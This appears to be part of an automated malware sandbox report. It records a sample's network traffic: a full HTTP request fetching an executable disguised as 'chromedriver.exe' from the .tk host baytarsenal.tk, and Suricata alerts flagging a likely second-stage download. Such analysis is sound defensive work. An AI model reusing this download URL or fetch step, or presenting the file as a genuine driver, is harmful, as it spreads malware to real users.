Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| baytarsenal.tk | 145.14.144.63 |
- TCP Requests
GET
200
http://baytarsenal.tk/ccdriver/chromedriver.exe
REQUEST
RESPONSE
BODY
GET /ccdriver/chromedriver.exe HTTP/1.1
Host: baytarsenal.tk
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 11 Aug 2021 08:52:38 GMT
Content-Type: application/octet-stream
Content-Length: 11107328
Connection: keep-alive
Last-Modified: Tue, 08 Jun 2021 11:07:12 GMT
Accept-Ranges: bytes
Server: awex
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Request-ID: bb329bd23b9d1f3cc12460ca300b32d7
ICMP traffic
No ICMP traffic performed.
IRC traffic
| Command | Params | Type |
|---|---|---|
| CONNECT | %s HTTP/1.1 | client |
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| UDP 192.168.56.102:52336 -> 8.8.8.8:53 | 2012811 | ET DNS Query to a .tk domain - Likely Hostile | Potentially Bad Traffic |
| UDP 192.168.56.102:52336 -> 164.124.101.2:53 | 2012811 | ET DNS Query to a .tk domain - Likely Hostile | Potentially Bad Traffic |
| TCP 192.168.56.102:49165 -> 145.14.144.92:80 | 2012810 | ET POLICY HTTP Request to a *.tk domain | Potentially Bad Traffic |
| TCP 192.168.56.102:49165 -> 145.14.144.92:80 | 2031094 | ET HUNTING Request to .TK Domain with Minimal Headers | Potentially Bad Traffic |
| TCP 145.14.144.92:80 -> 192.168.56.102:49165 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 145.14.144.92:80 -> 192.168.56.102:49165 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts